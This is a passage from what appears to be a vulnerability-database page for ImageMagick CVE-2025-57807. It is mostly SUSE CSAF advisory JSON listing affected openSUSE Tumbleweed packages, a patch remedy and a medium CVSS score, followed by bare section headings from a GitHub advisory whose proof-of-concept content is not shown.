          "openSUSE Tumbleweed:ImageMagick-7.1.2.3-1.1.x86_64",
          "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.3-1.1.aarch64",
          "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.3-1.1.ppc64le",
          "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.3-1.1.s390x",
          "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.3-1.1.x86_64",
          "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.3-1.1.aarch64",
          "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.3-1.1.ppc64le",
          "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.3-1.1.s390x",
          "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.3-1.1.x86_64",
          "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.3-1.1.aarch64",
          "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.3-1.1.ppc64le",
          "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.3-1.1.s390x",
          "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.3-1.1.x86_64",
          "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.3-1.1.aarch64",
          "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.3-1.1.ppc64le",
          "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.3-1.1.s390x",
          "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.3-1.1.x86_64",
          "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.3-1.1.aarch64",
          "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.3-1.1.ppc64le",
          "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.3-1.1.s390x",
          "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.3-1.1.x86_64",
          "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.aarch64",
          "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.s390x",
          "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.x86_64",
          "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.3-1.1.aarch64",
          "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.3-1.1.s390x",
          "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.3-1.1.x86_64",
          "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.3-1.1.aarch64",
          "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.3-1.1.s390x",
          "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.3-1.1.x86_64",
          "openSUSE Tumbleweed:libMagick++-devel-7.1.2.3-1.1.aarch64",
          "openSUSE Tumbleweed:libMagick++-devel-7.1.2.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libMagick++-devel-7.1.2.3-1.1.s390x",
          "openSUSE Tumbleweed:libMagick++-devel-7.1.2.3-1.1.x86_64",
          "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.aarch64",
          "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.s390x",
          "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.x86_64",
          "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.aarch64",
          "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.s390x",
          "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.x86_64",
          "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.aarch64",
          "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.s390x",
          "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.x86_64",
          "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.aarch64",
          "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.s390x",
          "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.x86_64",
          "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.3-1.1.aarch64",
          "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.3-1.1.ppc64le",
          "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.3-1.1.s390x",
          "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.3-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2025-57807",
          "url": "https://www.suse.com/security/cve/CVE-2025-57807"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1249362 for CVE-2025-57807",
          "url": "https://bugzilla.suse.com/1249362"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:ImageMagick-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:ImageMagick-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:ImageMagick-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:ImageMagick-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:libMagick++-devel-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:libMagick++-devel-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libMagick++-devel-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:libMagick++-devel-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.3-1.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 4.2,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:ImageMagick-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:ImageMagick-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:ImageMagick-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:ImageMagick-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:libMagick++-devel-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:libMagick++-devel-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libMagick++-devel-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:libMagick++-devel-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.x86_64",
            "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.3-1.1.aarch64",
            "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.3-1.1.ppc64le",
            "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.3-1.1.s390x",
            "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.3-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-09-11T00:00:00Z",
          "details": "moderate"
        }
      ],
      "title": "CVE-2025-57807"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2025-57807 (GCVE-0-2025-57807)

Vulnerability from cvelistv5

fkie_cve-2025-57807

Vulnerability from fkie_nvd

ghsa-23hg-53q6-hqfg

Vulnerability from github

Executive Summary

Affected Scope

Technical Root Cause

Exploitability & Reachability

Impact Assessment

CVSS v3.1 Rationale (9.8)

Violated Invariant

Remediation (Principle)

Regression & Compatibility

Vendor Verification Checklist

PoC / Reproduction / Notes

Environment

Build ImageMagick 7.1.2-0 (static, minimal)

Build & Run the PoC (memory-backed BlobStream)

include

include

include

include

include "MagickCore/blob-private.h"

Use the private prefix for pkg-config

Strict ASan for crisp failure

Compile (static link pulls transitive deps via --static)

Execute and capture

Debugger Verification (manual)

First stop (prime write)

Second stop (post-seek write)

Into the fault; if inside memmove (no locals):

Credits

opensuse-su-2025:15543-1

Vulnerability from csaf_opensuse

Tags

Sightings

Nomenclature